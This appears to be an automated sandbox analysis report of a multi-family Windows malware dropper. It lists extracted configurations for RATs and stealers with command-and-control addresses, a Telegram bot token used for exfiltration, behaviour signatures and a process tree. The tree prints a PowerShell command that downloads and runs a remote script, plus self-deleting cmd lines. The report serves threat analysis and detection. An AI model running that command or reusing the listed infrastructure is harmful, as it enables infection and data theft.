agenttesla | 188e97ba18d7394cb3949e66c8aeb062e3ea8675371d0ee2b5126b52366530ae

max time kernel
17s
max time network
287s
platform
windows10-1703_x64
resource
win10-20230220-en
resource tags

arch:x64arch:x86image:win10-20230220-enlocale:en-usos:windows10-1703-x64system
submitted
02-06-2023 11:55

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

a.exe
Size

5KB
MD5

8ce1f6882edc51f701bbe648e40dd133
SHA1

496b3df4657e9d11df14a8ad267061d97249b511
SHA256

188e97ba18d7394cb3949e66c8aeb062e3ea8675371d0ee2b5126b52366530ae
SHA512

5826ea307fa12db5a8005fae8758314c0810e956ead3504fda7cadaccdbe737d609dfdfdc51996ab2eb350eae20398f8fbb97b16aa01f2af373c1ba20767d7d6
SSDEEP

48:6jtGAK8lb9ivcfaFSfkQLJhyPFlL8thCb/IExQpwOulavTqXSfbNtm:OI0iUaakQqDgtmQpmsvNzNt

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://transparenciacanaa.com.br/cidadejunina/js/vendor/debug2.ps1

Extracted

Family

xworm

62.171.178.45:7000

Attributes

install_file
USB.exe

Extracted

Family

snakekeylogger

https://api.telegram.org/bot6184780923:AAHbCGrBU_2zg9A-73yTyKKCMGf1tkzUFbM/sendMessage?chat_id=759814203

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

Default

141.98.102.235:16296

Mutex

AsyncMutex_6SI8OkPnk

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Extracted

Family

nanocore

Version

1.2.2.0

ezemnia3.ddns.net:62335

91.193.75.178:62335

Mutex

954449b5-566c-46fe-92f0-8eb82a7f77b0

Attributes

activate_away_mode
true
backup_connection_host
91.193.75.178
backup_dns_server
8.8.4.4
buffer_size
65535
build_time
2023-01-23T18:14:17.620110936Z
bypass_user_account_control
true
bypass_user_account_control_data
clear_access_control
true
clear_zone_identifier
false
connect_delay
4000
connection_port
62335
default_group
Cashout
enable_debug_mode
true
gc_threshold
1.048576e+07
keep_alive_timeout
30000
keyboard_logging
false
lan_timeout
2500
max_packet_size
1.048576e+07
mutex
954449b5-566c-46fe-92f0-8eb82a7f77b0
mutex_timeout
5000
prevent_system_sleep
false
primary_connection_host
ezemnia3.ddns.net
primary_dns_server
8.8.8.8
request_elevation
true
restart_delay
5000
run_delay
0
run_on_startup
false
set_critical_process
true
timeout_interval
5000
use_custom_dns_server
false
version
1.2.2.0
wan_timeout
8000

Extracted

Family

remcos

Botnet

RemoteHost

127.0.0.1:55433

185.65.134.166:55433

10.11.0.5:55433

45.128.234.54:55433

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-UQ90W9
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
startup_value
Remcos
take_screenshot_option
false
take_screenshot_time
5

Extracted

Family

redline

Botnet

dusa

83.97.73.127:19045

Attributes

auth_value
ee896466545fedf9de5406175fb82de5

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla
Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
NanoCore
NanoCore is a remote access tool (RAT) with a variety of capabilities.
keylogger trojan stealer spyware nanocore

Process spawned unexpected child process 6 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6284	1320	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5996	1320	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6172	1320	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2084	1320	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6540	1320	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	688	1320	schtasks.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline
Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
stealer keylogger snakekeylogger

Snake Keylogger payload 2 IoCs

Processes:

resource	yara_rule
behavioral1/memory/4364-207-0x0000000000400000-0x000000000041E000-memory.dmp	family_snakekeylogger
behavioral1/memory/2192-284-0x0000000000400000-0x0000000000426000-memory.dmp	family_snakekeylogger

StormKitty
StormKitty is an open source info stealer written in C#.
stealer stormkitty

StormKitty payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/4364-207-0x0000000000400000-0x000000000041E000-memory.dmp	family_stormkitty

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

cc.exe

description pid process target process

PID 4632 created 3156 4632 cc.exe Explorer.EXE
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

description	pid	process	target process
PID 4632 created 3156	4632	cc.exe	Explorer.EXE

Async RAT payload 1 IoCs

rat

Processes:

resource	yara_rule
behavioral1/memory/2728-208-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

sp.exe

description ioc process

Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ sp.exe
Downloads MZ/PE file
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	sp.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

sp.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	sp.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	sp.exe

Executes dropped EXE 10 IoCs

Processes:

2.exehkcmd.exeDIV.execc.exesp.exeWindowsApp1.exegrace.exeConhost.exega.exeNano.exe

pid process

2828 2.exe
4280 hkcmd.exe
3588 DIV.exe
4632 cc.exe
2144 sp.exe
2976 WindowsApp1.exe
3656 grace.exe
3152 Conhost.exe
752 ga.exe
4824 Nano.exe

pid	process
2828	2.exe
4280	hkcmd.exe
3588	DIV.exe
4632	cc.exe
2144	sp.exe
2976	WindowsApp1.exe
3656	grace.exe
3152	Conhost.exe
752	ga.exe
4824	Nano.exe

Themida packer 9 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\a\sp.exe	themida
C:\Users\Admin\AppData\Local\Temp\a\sp.exe	themida
behavioral1/memory/2144-164-0x00007FF7D4290000-0x00007FF7D4A95000-memory.dmp	themida
behavioral1/memory/2144-165-0x00007FF7D4290000-0x00007FF7D4A95000-memory.dmp	themida
behavioral1/memory/2144-168-0x00007FF7D4290000-0x00007FF7D4A95000-memory.dmp	themida
behavioral1/memory/2144-170-0x00007FF7D4290000-0x00007FF7D4A95000-memory.dmp	themida
behavioral1/memory/2144-172-0x00007FF7D4290000-0x00007FF7D4A95000-memory.dmp	themida
behavioral1/memory/2144-268-0x00007FF7D4290000-0x00007FF7D4A95000-memory.dmp	themida
behavioral1/memory/2144-354-0x00007FF7D4290000-0x00007FF7D4A95000-memory.dmp	themida

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/memory/5096-264-0x0000000000400000-0x0000000000444000-memory.dmp	upx
behavioral1/memory/5096-277-0x0000000000400000-0x0000000000444000-memory.dmp	upx
behavioral1/memory/5096-274-0x0000000000400000-0x0000000000444000-memory.dmp	upx
behavioral1/memory/5096-295-0x0000000000400000-0x0000000000444000-memory.dmp	upx

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

sp.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA sp.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 6 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

161 ipinfo.io
165 ipinfo.io
169 ip-api.com
26 checkip.dyndns.org
43 api.ipify.org
44 api.ipify.org
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

sp.exe

pid process

2144 sp.exe
Suspicious use of SetThreadContext 2 IoCs

Processes:

Conhost.exega.exe

description pid process target process

PID 3152 set thread context of 4364 3152 Conhost.exe Caspol.exe
PID 752 set thread context of 2728 752 ga.exe Caspol.exe
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exe

pid process

4312 sc.exe
2808 sc.exe
6680 sc.exe
5216 sc.exe
6044 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sp.exe

flow	ioc
161	ipinfo.io
165	ipinfo.io
169	ip-api.com
26	checkip.dyndns.org
43	api.ipify.org
44	api.ipify.org

pid	process
2144	sp.exe

description	pid	process	target process
PID 3152 set thread context of 4364	3152	Conhost.exe	Caspol.exe
PID 752 set thread context of 2728	752	ga.exe	Caspol.exe

pid	process
4312	sc.exe
2808	sc.exe
6680	sc.exe
5216	sc.exe
6044	sc.exe

Program crash 6 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
1792	4632	WerFault.exe	cc.exe
3544	4136	WerFault.exe	b9324549.exe
4128	4380	WerFault.exe	Firefox.exe
3964	2224	WerFault.exe	Firefox.exe
3392	2684	WerFault.exe	rundll32.exe
5460	2684	WerFault.exe	rundll32.exe

Creates scheduled task(s) 1 TTPs 10 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
3060	schtasks.exe
6284	schtasks.exe
5996	schtasks.exe
2084	schtasks.exe
3344	schtasks.exe
6720	schtasks.exe
6540	schtasks.exe
688	schtasks.exe
4116	schtasks.exe
6172	schtasks.exe

Delays execution with timeout.exe 2 IoCs
evasion

Processes:

timeout.exetimeout.exe

pid process

1564 timeout.exe
6488 timeout.exe
Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery
T1057

Processes:

tasklist.exe

pid process

5968 tasklist.exe

pid	process
1564	timeout.exe
6488	timeout.exe

pid	process
5968	tasklist.exe

GoLang User-Agent 9 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

Processes:

description	flow	ioc
HTTP User-Agent header	213	Go-http-client/1.1
HTTP User-Agent header	218	Go-http-client/1.1
HTTP User-Agent header	534	Go-http-client/1.1
HTTP User-Agent header	537	Go-http-client/1.1
HTTP User-Agent header	191	Go-http-client/1.1
HTTP User-Agent header	192	Go-http-client/1.1
HTTP User-Agent header	199	Go-http-client/1.1
HTTP User-Agent header	212	Go-http-client/1.1
HTTP User-Agent header	531	Go-http-client/1.1

Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

6580 taskkill.exe

pid	process
6580	taskkill.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

a.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD	a.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f0f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f	a.exe

Runs net.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

1284 PING.EXE
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

cc.exe2.exe

pid process

4632 cc.exe
4632 cc.exe
2828 2.exe
2828 2.exe
4632 cc.exe
4632 cc.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

a.exeWindowsApp1.exe

description pid process

Token: SeDebugPrivilege 2140 a.exe
Token: SeDebugPrivilege 2976 WindowsApp1.exe

pid	process
1284	PING.EXE

pid	process
4632	cc.exe
4632	cc.exe
2828	2.exe
2828	2.exe
4632	cc.exe
4632	cc.exe

description	pid	process
Token: SeDebugPrivilege	2140	a.exe
Token: SeDebugPrivilege	2976	WindowsApp1.exe

Suspicious use of WriteProcessMemory 46 IoCs

Processes:

a.execc.exeConhost.exega.exe

description	pid	process	target process
PID 2140 wrote to memory of 2828	2140	a.exe	2.exe
PID 2140 wrote to memory of 2828	2140	a.exe	2.exe
PID 2140 wrote to memory of 2828	2140	a.exe	2.exe
PID 2140 wrote to memory of 4280	2140	a.exe	hkcmd.exe
PID 2140 wrote to memory of 4280	2140	a.exe	hkcmd.exe
PID 2140 wrote to memory of 4280	2140	a.exe	hkcmd.exe
PID 2140 wrote to memory of 3588	2140	a.exe	DIV.exe
PID 2140 wrote to memory of 3588	2140	a.exe	DIV.exe
PID 2140 wrote to memory of 3588	2140	a.exe	DIV.exe
PID 2140 wrote to memory of 4632	2140	a.exe	cc.exe
PID 2140 wrote to memory of 4632	2140	a.exe	cc.exe
PID 2140 wrote to memory of 4632	2140	a.exe	cc.exe
PID 2140 wrote to memory of 2144	2140	a.exe	sp.exe
PID 2140 wrote to memory of 2144	2140	a.exe	sp.exe
PID 2140 wrote to memory of 2976	2140	a.exe	WindowsApp1.exe
PID 2140 wrote to memory of 2976	2140	a.exe	WindowsApp1.exe
PID 2140 wrote to memory of 2976	2140	a.exe	WindowsApp1.exe
PID 2140 wrote to memory of 3656	2140	a.exe	grace.exe
PID 2140 wrote to memory of 3656	2140	a.exe	grace.exe
PID 2140 wrote to memory of 3656	2140	a.exe	grace.exe
PID 4632 wrote to memory of 2632	4632	cc.exe	certreq.exe
PID 4632 wrote to memory of 2632	4632	cc.exe	certreq.exe
PID 4632 wrote to memory of 2632	4632	cc.exe	certreq.exe
PID 4632 wrote to memory of 2632	4632	cc.exe	certreq.exe
PID 2140 wrote to memory of 3152	2140	a.exe	Conhost.exe
PID 2140 wrote to memory of 3152	2140	a.exe	Conhost.exe
PID 2140 wrote to memory of 752	2140	a.exe	ga.exe
PID 2140 wrote to memory of 752	2140	a.exe	ga.exe
PID 3152 wrote to memory of 4364	3152	Conhost.exe	Caspol.exe
PID 3152 wrote to memory of 4364	3152	Conhost.exe	Caspol.exe
PID 3152 wrote to memory of 4364	3152	Conhost.exe	Caspol.exe
PID 3152 wrote to memory of 4364	3152	Conhost.exe	Caspol.exe
PID 3152 wrote to memory of 4364	3152	Conhost.exe	Caspol.exe
PID 3152 wrote to memory of 4364	3152	Conhost.exe	Caspol.exe
PID 3152 wrote to memory of 4364	3152	Conhost.exe	Caspol.exe
PID 3152 wrote to memory of 4364	3152	Conhost.exe	Caspol.exe
PID 752 wrote to memory of 2728	752	ga.exe	Caspol.exe
PID 752 wrote to memory of 2728	752	ga.exe	Caspol.exe
PID 752 wrote to memory of 2728	752	ga.exe	Caspol.exe
PID 752 wrote to memory of 2728	752	ga.exe	Caspol.exe
PID 752 wrote to memory of 2728	752	ga.exe	Caspol.exe
PID 752 wrote to memory of 2728	752	ga.exe	Caspol.exe
PID 752 wrote to memory of 2728	752	ga.exe	Caspol.exe
PID 752 wrote to memory of 2728	752	ga.exe	Caspol.exe
PID 2140 wrote to memory of 4824	2140	a.exe	Nano.exe
PID 2140 wrote to memory of 4824	2140	a.exe	Nano.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3156

C:\Users\Admin\AppData\Local\Temp\a.exe
"C:\Users\Admin\AppData\Local\Temp\a.exe"
2⤵
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2140

C:\Users\Admin\AppData\Local\Temp\a\2.exe
"C:\Users\Admin\AppData\Local\Temp\a\2.exe"
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2828

C:\Users\Admin\AppData\Local\Temp\a\hkcmd.exe
"C:\Users\Admin\AppData\Local\Temp\a\hkcmd.exe"
3⤵
- Executes dropped EXE
PID:4280

C:\Users\Admin\AppData\Local\Temp\a\hkcmd.exe
"C:\Users\Admin\AppData\Local\Temp\a\hkcmd.exe"
4⤵
PID:3736

C:\Users\Admin\AppData\Local\Temp\a\hkcmd.exe
"C:\Users\Admin\AppData\Local\Temp\a\hkcmd.exe"
4⤵
PID:4100

C:\Users\Admin\AppData\Local\Temp\a\hkcmd.exe
"C:\Users\Admin\AppData\Local\Temp\a\hkcmd.exe"
4⤵
PID:4880

C:\Users\Admin\AppData\Local\Temp\a\hkcmd.exe
"C:\Users\Admin\AppData\Local\Temp\a\hkcmd.exe"
4⤵
PID:5024

C:\Users\Admin\AppData\Local\Temp\a\DIV.exe
"C:\Users\Admin\AppData\Local\Temp\a\DIV.exe"
3⤵
- Executes dropped EXE
PID:3588

C:\Users\Admin\AppData\Local\Temp\a\cc.exe
"C:\Users\Admin\AppData\Local\Temp\a\cc.exe"
3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4632

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4632 -s 784
4⤵
- Program crash
PID:1792

C:\Users\Admin\AppData\Local\Temp\a\sp.exe
"C:\Users\Admin\AppData\Local\Temp\a\sp.exe"
3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2144

C:\Users\Admin\AppData\Local\Temp\a\WindowsApp1.exe
"C:\Users\Admin\AppData\Local\Temp\a\WindowsApp1.exe"
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2976

C:\Users\Admin\AppData\Local\Temp\a\grace.exe
"C:\Users\Admin\AppData\Local\Temp\a\grace.exe"
3⤵
- Executes dropped EXE
PID:3656

C:\Users\Admin\AppData\Local\Temp\a\M.exe
"C:\Users\Admin\AppData\Local\Temp\a\M.exe"
3⤵
PID:3152

C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"
4⤵
PID:4364

C:\Users\Admin\AppData\Local\Temp\a\ga.exe
"C:\Users\Admin\AppData\Local\Temp\a\ga.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:752

C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"
4⤵
PID:2728

C:\Users\Admin\AppData\Local\Temp\a\smss.exe
"C:\Users\Admin\AppData\Local\Temp\a\smss.exe"
3⤵
PID:4852

C:\Users\Admin\AppData\Local\Temp\a\smss.exe
"C:\Users\Admin\AppData\Local\Temp\a\smss.exe"
4⤵
PID:5096

C:\Users\Admin\AppData\Local\Temp\a\Nano.exe
"C:\Users\Admin\AppData\Local\Temp\a\Nano.exe"
3⤵
- Executes dropped EXE
PID:4824

C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"
4⤵
PID:3332

C:\Users\Admin\AppData\Local\Temp\a\R.exe
"C:\Users\Admin\AppData\Local\Temp\a\R.exe"
3⤵
PID:5004

C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"
4⤵
PID:2716

C:\Users\Admin\AppData\Local\Temp\a\ar.exe
"C:\Users\Admin\AppData\Local\Temp\a\ar.exe"
3⤵
PID:4160

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
4⤵
PID:2192

C:\Users\Admin\AppData\Local\Temp\a\ARR.exe
"C:\Users\Admin\AppData\Local\Temp\a\ARR.exe"
3⤵
PID:1708

C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"
4⤵
PID:2548

C:\Users\Admin\AppData\Local\Temp\a\D.exe
"C:\Users\Admin\AppData\Local\Temp\a\D.exe"
3⤵
PID:4116

C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"
4⤵
PID:984

C:\Users\Admin\AppData\Local\Temp\a\NEV.exe
"C:\Users\Admin\AppData\Local\Temp\a\NEV.exe"
3⤵
PID:2792

C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"
4⤵
PID:2600

C:\Windows\SysWOW64\cmstp.exe
"C:\Windows\SysWOW64\cmstp.exe"
3⤵
PID:4612

C:\Program Files\Mozilla Firefox\Firefox.exe
"C:\Program Files\Mozilla Firefox\Firefox.exe"
4⤵
PID:4380

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4380 -s 456
5⤵
- Program crash
PID:4128

C:\Windows\SysWOW64\explorer.exe
"C:\Windows\SysWOW64\explorer.exe"
3⤵
PID:3732

C:\Program Files\Mozilla Firefox\Firefox.exe
"C:\Program Files\Mozilla Firefox\Firefox.exe"
4⤵
PID:2224

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2224 -s 116
5⤵
- Program crash
PID:3964

C:\Users\Admin\AppData\Local\Temp\a\ogumbgejapxd.exe
"C:\Users\Admin\AppData\Local\Temp\a\ogumbgejapxd.exe"
3⤵
PID:4400

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\AppData\Local\Temp\a\ogumbgejapxd.exe
4⤵
PID:4804

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 0
5⤵
PID:4168

C:\Users\Admin\AppData\Local\Temp\a\ventascry.exe
"C:\Users\Admin\AppData\Local\Temp\a\ventascry.exe"
3⤵
PID:4920

C:\Users\Admin\AppData\Local\Temp\a\ventascry.exe
"C:\Users\Admin\AppData\Local\Temp\a\ventascry.exe"
4⤵
PID:5108

C:\Users\Admin\AppData\Local\Temp\a\wasx.exe
"C:\Users\Admin\AppData\Local\Temp\a\wasx.exe"
3⤵
PID:4964

C:\Users\Admin\AppData\Local\Temp\a\wasx.exe
"C:\Users\Admin\AppData\Local\Temp\a\wasx.exe"
4⤵
PID:224

C:\Users\Admin\AppData\Local\Temp\a\dd.exe
"C:\Users\Admin\AppData\Local\Temp\a\dd.exe"
3⤵
PID:376

C:\Users\Admin\AppData\Local\Temp\a\dd.exe
"C:\Users\Admin\AppData\Local\Temp\a\dd.exe"
4⤵
PID:1528

C:\Users\Admin\AppData\Local\Temp\a\fotocr06.exe
"C:\Users\Admin\AppData\Local\Temp\a\fotocr06.exe"
3⤵
PID:1392

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\y0516981.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\y0516981.exe
4⤵
PID:2060

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\y0461493.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\y0461493.exe
5⤵
PID:1808

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\k6191735.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\k6191735.exe
6⤵
PID:4744

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
7⤵
PID:4140

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\l3554782.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\l3554782.exe
6⤵
PID:5056

C:\Users\Admin\AppData\Local\Temp\a\postmon.exe
"C:\Users\Admin\AppData\Local\Temp\a\postmon.exe"
3⤵
PID:4904

C:\Windows\System32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://transparenciacanaa.com.br/cidadejunina/js/vendor/debug2.ps1')"
4⤵
PID:5036

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command IEX(New-Object Net.Webclient).DownloadString('https://transparenciacanaa.com.br/cidadejunina/js/vendor/debug2.ps1')
5⤵
PID:660

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\a\postmon.exe" >> NUL
4⤵
PID:1884

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
5⤵
- Runs ping.exe
PID:1284

C:\Users\Admin\AppData\Local\Temp\a\U2th5k1keGkDeMw.exe
"C:\Users\Admin\AppData\Local\Temp\a\U2th5k1keGkDeMw.exe"
3⤵
PID:1780

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
4⤵
PID:5316

C:\Users\Admin\AppData\Local\Temp\a\Fecurity.exe
"C:\Users\Admin\AppData\Local\Temp\a\Fecurity.exe"
3⤵
PID:4848

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
4⤵
PID:4296

C:\Users\Admin\AppData\Local\Temp\a\foto148.exe
"C:\Users\Admin\AppData\Local\Temp\a\foto148.exe"
3⤵
PID:5020

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\x6389655.exe
